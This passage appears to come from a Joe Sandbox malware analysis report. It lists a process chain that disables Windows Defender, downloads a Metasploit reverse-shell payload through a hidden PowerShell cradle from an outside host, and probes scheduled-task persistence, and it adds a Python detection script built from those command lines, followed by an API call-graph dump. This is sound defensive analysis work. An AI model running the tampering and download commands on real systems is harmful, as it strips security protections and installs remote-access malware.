                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:50
                                                            Start time:13:55:01
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:51
                                                            Start time:13:55:01
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:52
                                                            Start time:13:55:03
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:53
                                                            Start time:13:55:04
                                                            Start date:23/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\reddit.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\reddit.exe"
                                                            Imagebase:0x400000
                                                            File size:73'802 bytes
                                                            MD5 hash:23544090C6D379E3ECA7343C4F05D4D2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000035.00000002.2895573514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000035.00000002.2895573514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000035.00000000.2341032369.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000035.00000000.2341032369.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                                            Has exited:false

                                                            Target ID:54
                                                            Start time:13:55:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\attrib.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                                            Imagebase:0x7ff665990000
                                                            File size:23'040 bytes
                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:55
                                                            Start time:13:55:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditLogon"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:56
                                                            Start time:13:55:04
                                                            Start date:23/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /query /TN "RunRedditMinute"
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

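The command lines recorded for Target IDs 42 through 56 form a compact tampering chain: reg.exe writes DisableAntiSpyware and DisableRealtimeMonitoring as REG_DWORD 1 under the Defender policy key, powershell.exe issues Set-MpPreference -DisableRealtimeMonitoring $true, a hidden-window PowerShell downloads reddit.exe into the user's AppData\Local\Temp directory, attrib changes the hidden attribute on the copied WO.exe, and schtasks queries the RunRedditLogon and RunRedditMinute task names. The following is an added detection example, not part of the Joe Sandbox report: it encodes each of those behaviours as a rule over process-creation events. The events it scans are constructed from the command lines listed above plus two benign controls, and the Event shape (image path plus command line) is an assumed minimal Sysmon/4688-style record, not the sandbox's export format; the rule names are likewise the example's own.

```python
"""Process-creation rules for the Defender-tampering, download-cradle and
persistence-reconnaissance command lines in this analysis.

Added example, not Joe Sandbox output. SAMPLE_EVENTS is constructed from the
command lines in the process list plus two benign lines; Event is an assumed,
minimal Sysmon/4688-like record (image path + command line)."""
import re
from collections import Counter
from dataclasses import dataclass

# Policy hive written by reg.exe in Target IDs 42-44 (lower-cased for matching).
DEFENDER_POLICY_KEY = r"hklm\software\policies\microsoft\windows defender"


@dataclass(frozen=True)
class Event:
    image: str         # full path of the created process
    command_line: str  # raw command line as logged


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    command_line: str


def _defender_policy_tamper(image: str, cmd: str) -> bool:
    """reg.exe ADD of a Disable* DWORD=1 under the Defender policy key."""
    return (image == "reg.exe" and " add " in cmd and DEFENDER_POLICY_KEY in cmd
            and re.search(r'/v\s+"?(disableantispyware|disablerealtimemonitoring)"?', cmd) is not None
            and re.search(r"/d\s+1\b", cmd) is not None)


def _mppreference_disable(image: str, cmd: str) -> bool:
    """Set-MpPreference switching any -Disable* option to $true."""
    return (image == "powershell.exe" and "set-mppreference" in cmd
            and re.search(r"-disable\w+\s+\$true", cmd) is not None)


def _download_cradle_to_temp(image: str, cmd: str) -> bool:
    """WebClient.DownloadFile writing into the user's Temp directory."""
    return (image == "powershell.exe" and "downloadfile(" in cmd
            and "\\appdata\\local\\temp\\" in cmd)


def _attrib_hidden_in_profile(image: str, cmd: str) -> bool:
    """attrib +h or -h on a file under AppData\\Roaming (here the copied WO.exe)."""
    return (image == "attrib.exe" and re.search(r"\s[-+]h\b", cmd) is not None
            and "\\appdata\\roaming\\" in cmd)


def _schtasks_query_by_name(image: str, cmd: str) -> bool:
    """schtasks /query /TN <name>: low confidence alone, correlate with the parent."""
    return image == "schtasks.exe" and "/query" in cmd and "/tn" in cmd


RULES = {
    "defender_policy_tamper": _defender_policy_tamper,
    "mppreference_disable": _mppreference_disable,
    "download_cradle_to_temp": _download_cradle_to_temp,
    "attrib_hidden_in_profile": _attrib_hidden_in_profile,
    "schtasks_query_by_name": _schtasks_query_by_name,
}


def scan(events):
    """One Finding per (event, matching rule); matching is case-insensitive."""
    findings = []
    for ev in events:
        image = ev.image.rsplit("\\", 1)[-1].lower()
        cmd = ev.command_line.lower()
        for name, predicate in RULES.items():
            if predicate(image, cmd):
                findings.append(Finding(name, ev.image, ev.command_line))
    return findings


def summarize(findings):
    """Rule name -> number of hits."""
    return dict(Counter(f.rule for f in findings))


SYS32 = "C:\\Windows\\System32\\"
PS = SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed from the report's command lines; the last two are benign controls.
SAMPLE_EVENTS = [
    Event(SYS32 + "reg.exe", r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f'),
    Event(SYS32 + "reg.exe", r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f'),
    Event(PS, r'powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    Event(PS, r'''powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"'''),
    Event(SYS32 + "attrib.exe", r'attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"'),
    Event(SYS32 + "schtasks.exe", r'schtasks /query /TN "RunRedditLogon"'),
    Event(SYS32 + "schtasks.exe", r'schtasks /query /TN "RunRedditMinute"'),
    Event(SYS32 + "reg.exe", r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'),
    Event(PS, r'powershell -Command "Get-MpPreference"'),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.command_line}")
```

Each rule matches the attempt, not its effect. On a host with Tamper Protection enabled Defender rejects both the Set-MpPreference change and the policy-key writes, and Defender has ignored DisableAntiSpyware on client editions since the August 2020 platform update, yet the process-creation records still appear and remain the signal to alert on. All three tampering commands in this report ran with administrator privileges, which the HKLM policy hive requires; the same command lines from an unelevated process would fail at the registry write and should still be flagged.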

                                                              Execution Graph

                                                              Execution Coverage:14.4%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:6.8%
                                                              Total number of Nodes:814
                                                              Total number of Limit Nodes:20
                                                              execution_graph: node and edge dump of the interactive call-graph rendering for the image based at 0x140000000 (matching WO.exe's imagebase). The recoverable content is the set of API references. From the entry function at 0x140001000 the graph shows HeapCreate, TlsAlloc and TlsSetValue (runtime heap and TLS setup), InitCommonControlsEx and CoInitialize, InitializeCriticalSection, HeapAlloc/HeapReAlloc/HeapFree, RemoveVectoredExceptionHandler and AddVectoredExceptionHandler, GetLastError/TlsGetValue/SetLastError, several sub-trees summarised only by their API-call counts (11 to 232 calls each), and finally HeapDestroy, TlsFree and ExitProcess. Other nodes reference RtlLookupFunctionEntry and RtlVirtualUnwind, GetCurrentProcess and TerminateProcess, CreateFileW/SetFilePointer/WriteFile, MultiByteToWideChar/WideCharToMultiByte, wcslen/wcsncpy/_wcsdup/_wcsicmp, memmove/memset/malloc/free, EnterCriticalSection/LeaveCriticalSection/DeleteCriticalSection, RegisterClassExW, CreateWindowExW, CreateAcceleratorTableW, SendMessageW and PostMessageW, SetForegroundWindow/BringWindowToTop/GetForegroundWindow, IsWindowVisible/IsWindowEnabled/EnableWindow, GetWindowThreadProcessId/GetCurrentThreadId/GetWindowLongPtrW, GetSystemMetrics, GetStockObject, LoadIconW/LoadCursorW, Sleep and CloseHandle.
8275->8299 8276->8277 8281 14000bb48 8277->8281 8279 14000bba9 HeapFree 8278->8279 8280 14000bbbb 8278->8280 8279->8280 8283 14000bbd2 8280->8283 8284 14000bbc0 HeapFree 8280->8284 8285 14000bb51 8281->8285 8286 14000bb0a GetMessageW 8281->8286 8288 14000bbd7 HeapFree 8283->8288 8289 14000b751 8283->8289 8284->8283 8290 14000bb56 DestroyAcceleratorTable 8285->8290 8291 14000bb5f 8285->8291 8286->8285 8287 14000bb20 TranslateAcceleratorW 8286->8287 8287->8281 8292 14000bb34 TranslateMessage DispatchMessageW 8287->8292 8288->8289 8290->8291 8291->8275 8293 14000bb68 wcslen 8291->8293 8292->8281 8294 1400126d0 2 API calls 8293->8294 8295 14000bb77 wcscpy HeapFree 8294->8295 8295->8275 8297 14000b5ea wcslen HeapAlloc 8296->8297 8298 14000b60e 8296->8298 8297->8298 8298->8258 8299->8278 7767 14000c444 7768 14000c455 7767->7768 7769 14000c44d SetEnvironmentVariableW 7767->7769 7769->7768 8112 14000cec4 8113 14000cf4b 8112->8113 8114 14000cee9 8112->8114 8114->8113 8116 14000cf02 8114->8116 8120 14000d140 8114->8120 8116->8113 8119 140016538 5 API calls 8116->8119 8127 14000d1f0 8116->8127 8136 14000d02c 8116->8136 8119->8116 8121 14000d15b 8120->8121 8122 14000d1b4 memset 8121->8122 8123 14000d163 HeapFree 8121->8123 8125 1400168c0 HeapFree 8121->8125 8126 1400116f4 3 API calls 8121->8126 8124 14000d1d0 8122->8124 8123->8121 8124->8116 8125->8121 8126->8121 8128 14000d230 8127->8128 8130 14000d210 8127->8130 8129 14001147c 4 API calls 8128->8129 8135 14000d22e 8129->8135 8130->8128 8131 14000d21d 8130->8131 8133 1400168c0 HeapFree 8131->8133 8131->8135 8132 14000d295 8132->8116 8133->8135 8134 14000d281 memset 8134->8132 8135->8132 8135->8134 8137 14000d073 8136->8137 8138 14000d04c 8136->8138 8142 14000d08f 8137->8142 8157 14000d3a4 8137->8157 8151 14000cf74 8138->8151 8141 14000d051 8141->8137 8143 14000d059 8141->8143 8144 14001147c 4 API calls 8142->8144 8145 14000d06e 8143->8145 8149 1400168c0 HeapFree 8143->8149 8146 14000d0a6 8144->8146 8147 14000d11c 8145->8147 
8148 14000d108 memset 8145->8148 8146->8147 8150 14000d0ae wcslen HeapAlloc wcscpy 8146->8150 8147->8116 8148->8147 8149->8145 8150->8145 8152 14000cfa2 8151->8152 8154 14000cfe2 8151->8154 8153 14000d3a4 tolower 8152->8153 8155 14000cfa7 8153->8155 8154->8155 8156 14000cff8 wcscmp 8154->8156 8155->8141 8156->8154 8156->8155 8158 14000d3c7 tolower 8157->8158 8159 14000d3b8 8158->8159 8160 14000d3d0 8158->8160 8159->8158 8160->8142 8300 140003144 8301 140003147 8300->8301 8302 140012360 HeapFree 8301->8302 8303 140003156 8302->8303 8304 140012360 HeapFree 8303->8304 8305 140003168 8304->8305 7770 140002648 7771 14000264f 7770->7771 7772 140012360 HeapFree 7771->7772 7773 140002666 7772->7773 7774 140012360 HeapFree 7773->7774 7775 140002678 7774->7775 7776 140012360 HeapFree 7775->7776 7777 14000268a 7776->7777 7778 140012360 HeapFree 7777->7778 7779 14000269c 7778->7779 7780 140012360 HeapFree 7779->7780 7781 1400026ae 7780->7781 8161 1400088c9 8162 1400088e0 8161->8162 8163 1400088fa 8161->8163 8164 140009da0 _wcsicmp 8162->8164 8166 1400088eb 8162->8166 8165 14000afc0 _wcsicmp 8163->8165 8163->8166 8164->8166 8165->8166 7782 14000b64c 7783 14000b667 7782->7783 7784 14000b70e UnregisterClassW 7782->7784 7785 14000b68b 7783->7785 7787 14000b674 DefWindowProcW 7783->7787 7788 14000b67f 7783->7788 7786 14000b72c 7784->7786 7785->7786 7789 14000b6ea EnableWindow 7785->7789 7790 14000b6fc 7785->7790 7787->7786 7788->7785 7791 14000b695 GetWindowLongPtrW GetWindowTextLengthW HeapAlloc GetWindowTextW 7788->7791 7789->7790 7794 14000bf44 7790->7794 7791->7785 7795 14000bf57 EnumWindows 7794->7795 7796 14000bfbb 7794->7796 7798 14000b703 DestroyWindow 7795->7798 7799 14000bf77 GetCurrentThreadId 7795->7799 7797 14000bfc7 GetCurrentThreadId 7796->7797 7796->7798 7801 14000bfdb EnableWindow 7796->7801 7803 14000bff0 SetWindowPos 7796->7803 7805 140011c68 7796->7805 7797->7796 7798->7786 7800 14000bf85 7799->7800 7800->7798 7800->7799 7802 14000bf8b SetWindowPos 7800->7802 
7801->7796 7802->7800 7803->7796 7806 140011c74 HeapFree 7805->7806 7808 14001f820 7806->7808 8167 1400130cb 8169 1400130d0 8167->8169 8168 140014d80 3 API calls 8172 140013480 8168->8172 8170 1400132ba 8169->8170 8171 1400132aa memmove 8169->8171 8170->8168 8170->8172 8171->8170 8306 140002b4c 8307 1400123e0 21 API calls 8306->8307 8308 140002b6a 8307->8308 8391 140016fd0 8392 140017000 8391->8392 8392->8392 8393 14001700b MultiByteToWideChar malloc MultiByteToWideChar 8392->8393 7510 14000de50 7528 1400112a8 EnterCriticalSection 7510->7528 7512 14000de98 7513 14000deb6 7512->7513 7514 14000defb 7512->7514 7522 14000e04d 7512->7522 7515 14000dec9 7513->7515 7516 14000decd CreateFileW 7513->7516 7517 14000df42 7514->7517 7518 14000df00 7514->7518 7515->7516 7524 14000dfb7 7516->7524 7521 14000df5f CreateFileW 7517->7521 7517->7524 7519 14000df13 7518->7519 7520 14000df17 CreateFileW 7518->7520 7519->7520 7520->7524 7523 14000df8d CreateFileW 7521->7523 7521->7524 7523->7524 7524->7522 7525 14000dfe1 HeapAlloc 7524->7525 7526 14000dff9 7524->7526 7525->7526 7526->7522 7527 14000e036 SetFilePointer 7526->7527 7527->7522 7529 1400112e3 7528->7529 7530 1400112d0 7528->7530 7531 140011312 7529->7531 7532 1400112e9 HeapReAlloc 7529->7532 7533 140011cb0 HeapAlloc 7530->7533 7535 14001132d HeapAlloc 7531->7535 7537 14001131d 7531->7537 7532->7531 7534 1400112de 7533->7534 7536 140011352 LeaveCriticalSection 7534->7536 7535->7537 7536->7512 7537->7536 8173 1400086d0 8174 140008701 8173->8174 8175 1400086ee 8173->8175 8176 140008710 CharLowerW CharLowerW 8174->8176 8177 14000873e 8174->8177 8176->8174 8176->8177 7809 140002853 7830 1400123e0 7809->7830 7813 14000286b 7843 1400121c0 GetLastError TlsGetValue SetLastError 7813->7843 7815 140002889 7844 140012450 7815->7844 7817 140002898 7849 1400121c0 GetLastError TlsGetValue SetLastError 7817->7849 7819 1400028a6 7850 1400121c0 GetLastError TlsGetValue SetLastError 7819->7850 7821 1400028ba 7851 14000c8e0 7821->7851 7825 
1400028d4 7856 1400125d0 TlsGetValue 7825->7856 7827 1400028e5 7857 14000b574 7827->7857 7829 1400028fb 7831 1400123ed 7830->7831 7832 14001240f TlsGetValue 7830->7832 7835 140012060 5 API calls 7831->7835 7833 140002861 7832->7833 7834 140012420 7832->7834 7842 1400121c0 GetLastError TlsGetValue SetLastError 7833->7842 7873 140012bf0 HeapAlloc HeapAlloc TlsSetValue 7834->7873 7836 1400123f2 TlsGetValue 7835->7836 7864 140016cc4 7836->7864 7839 140012425 TlsGetValue 7841 140016cc4 13 API calls 7839->7841 7841->7833 7842->7813 7843->7815 7845 140012477 7844->7845 7846 140012469 wcslen 7844->7846 7847 1400126d0 2 API calls 7845->7847 7846->7845 7848 140012485 7847->7848 7848->7817 7849->7819 7850->7821 7852 14000c8f0 7851->7852 7853 1400126d0 2 API calls 7852->7853 7854 1400028ca 7853->7854 7855 140012520 TlsGetValue 7854->7855 7855->7825 7856->7827 7874 14000be5c GetForegroundWindow 7857->7874 7860 14000bf44 7 API calls 7861 14000b5a3 MessageBoxW 7860->7861 7862 14000bf44 7 API calls 7861->7862 7863 14000b5bf 7862->7863 7863->7829 7865 140016cf2 TlsAlloc InitializeCriticalSection 7864->7865 7866 140016d11 TlsGetValue 7864->7866 7865->7866 7867 140016de6 HeapAlloc 7866->7867 7868 140016d29 HeapAlloc 7866->7868 7869 14001240d 7867->7869 7868->7869 7870 140016d49 EnterCriticalSection 7868->7870 7869->7833 7871 140016d61 7 API calls 7870->7871 7872 140016d5e 7870->7872 7871->7867 7872->7871 7873->7839 7875 14000b596 7874->7875 7876 14000be76 GetWindowThreadProcessId GetCurrentProcessId 7874->7876 7875->7860 7876->7875 8394 1400031d9 8395 1400031dc 8394->8395 8396 140012360 HeapFree 8395->8396 8397 1400031eb 8396->8397 8398 14000c3dc GetEnvironmentVariableW 8399 14000c408 8398->8399 8400 1400126d0 2 API calls 8399->8400 8401 14000c413 GetEnvironmentVariableW 8400->8401 8178 1400076e0 8179 14000773d 8178->8179 8181 1400076f1 8178->8181 8180 140007729 wcsstr 8180->8179 8181->8179 8181->8180 8315 140007760 8316 1400077e7 8315->8316 8317 140007769 8315->8317 8317->8316 8318 
1400077b9 8317->8318 8319 1400077c0 wcsstr 8317->8319 8322 1400085f0 8318->8322 8321 1400077be 8319->8321 8323 14000869f 8322->8323 8324 140008617 CharLowerW 8322->8324 8323->8321 8325 140008630 8324->8325 8325->8323 8325->8325 8326 14000864c CharLowerW 8325->8326 8327 140008670 CharLowerW CharLowerW 8325->8327 8326->8325 8327->8325

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                                              • String ID: GetLongPathNameW$Kernel32.DLL
                                                              • API String ID: 820969696-2943376620
                                                              • Opcode ID: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction ID: 08c74a34c6d82e646fe97c561cc400b119dc1938ee8d5d8dcc972cb306c03a44
                                                              • Opcode Fuzzy Hash: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction Fuzzy Hash: 17116D31721B4086EF159F27A9843A967A1FB8CFC0F481029EF4E4B7A5DE39C8528340

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 4232179356-0
                                                              • Opcode ID: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction ID: 2ef6d83f5e2b3c8fb19d65fceeff62dc40447b47a2c1a218917e14d6a90cbc88
                                                              • Opcode Fuzzy Hash: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction Fuzzy Hash: E38162FBE69644E5EA07B763BC86BED5220D3AD3D4F504410FF08062A3EE3995E64B10

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 94 14000de50-14000de9e call 1400112a8 97 14000dea4-14000deb4 94->97 98 14000e098-14000e09b 94->98 100 14000deb6-14000dec7 97->100 101 14000defb-14000defe 97->101 99 14000e07f-14000e097 98->99 102 14000dec9 100->102 103 14000decd-14000def6 CreateFileW 100->103 104 14000df42-14000df46 101->104 105 14000df00-14000df11 101->105 102->103 106 14000dfbc-14000dfc0 103->106 109 14000dfb7 104->109 110 14000df48-14000df59 104->110 107 14000df13 105->107 108 14000df17-14000df40 CreateFileW 105->108 113 14000dfc6-14000dfc9 106->113 114 14000e05d-14000e06f call 1400111dc 106->114 107->108 108->106 109->106 111 14000df5b 110->111 112 14000df5f-14000df8b CreateFileW 110->112 111->112 112->113 115 14000df8d-14000dfb5 CreateFileW 112->115 113->114 116 14000dfcf-14000dfd8 113->116 118 14000e074-14000e07c 114->118 115->106 119 14000dff9 116->119 120 14000dfda-14000dfdf 116->120 118->99 122 14000dffd-14000e02d 119->122 120->119 121 14000dfe1-14000dff7 HeapAlloc 120->121 121->122 123 14000e04d-14000e05b 122->123 124 14000e02f-14000e034 122->124 123->114 123->118 124->123 125 14000e036-14000e047 SetFilePointer 124->125 125->123
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
                                                              • String ID:
                                                              • API String ID: 2685021396-0
                                                              • Opcode ID: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction ID: 9fd7d13fb8664e67d48ce56ae15862c74b29b4b7423edb5d501112f331116329
                                                              • Opcode Fuzzy Hash: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction Fuzzy Hash: 2B51D4B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 126 14000593c-14000593e 127 140005945-140005954 126->127 127->127 128 140005956-140005979 call 1400123e0 127->128 131 14000597b-140005987 128->131 132 140005a39-140005a53 131->132 133 14000598d-140005a33 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 131->133 135 140005a55-140005a61 132->135 133->131 133->132 137 140005b13-140005b2d 135->137 138 140005a67-140005b0d call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 135->138 141 140005b2f-140005b3b 137->141 138->135 138->137 144 140005b41-140005be7 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 141->144 145 140005bed-140005c07 141->145 144->141 144->145 149 140005c09-140005c15 145->149 153 140005cc7-140005ce1 149->153 154 140005c1b-140005cc1 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 149->154 159 140005ce3-140005cef 153->159 154->149 154->153 160 140005da1-140005dbb 159->160 161 140005cf5-140005d91 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 159->161 168 140005dbd-140005dc9 160->168 284 140005d96-140005d9b 161->284 175 140005e7f-140005e99 168->175 176 140005dcf-140005e79 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 168->176 184 140005e9b-140005ea7 175->184 176->168 176->175 192 140005f5d-140005f77 184->192 193 140005ead-140005f57 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 184->193 201 140005f79-140005f85 192->201 193->184 193->192 209 14000603b-140006055 201->209 210 140005f8b-140006035 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 201->210 219 140006057-140006063 209->219 210->201 210->209 228 140006119-14000657b call 
1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400047e2 call 140012210 call 14000c2bc GetModuleHandleW call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 140004134 call 1400121c0 * 2 call 140002c46 call 140006a58 call 140001e57 call 1400067aa call 1400121c0 * 2 call 14000ca70 call 1400049ea call 140012210 PathRemoveBackslashW call 140002bab call 1400121c0 * 3 call 140003cc9 call 140012520 call 1400125d0 call 14000c45c call 140006a58 call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400026bb call 140012210 call 140004ee2 call 1400121c0 call 140012450 call 140012210 PathQuoteSpacesW call 1400121c0 call 140012450 * 3 call 140012210 PathQuoteSpacesW 219->228 229 140006069-140006113 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 219->229 428 1400065a1-1400065a6 call 140003ddc 228->428 429 14000657d-14000659f call 140007284 228->429 229->219 229->228 284->159 284->160 432 1400065ab-1400067a9 call 1400121c0 * 2 call 140012450 * 3 call 140012520 call 1400121c0 * 2 call 14000daa8 call 140012520 call 1400121c0 call 140012450 * 2 call 1400125d0 * 3 call 1400029c8 call 140006a58 call 140002930 call 140012360 * 10 428->432 429->432
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmp
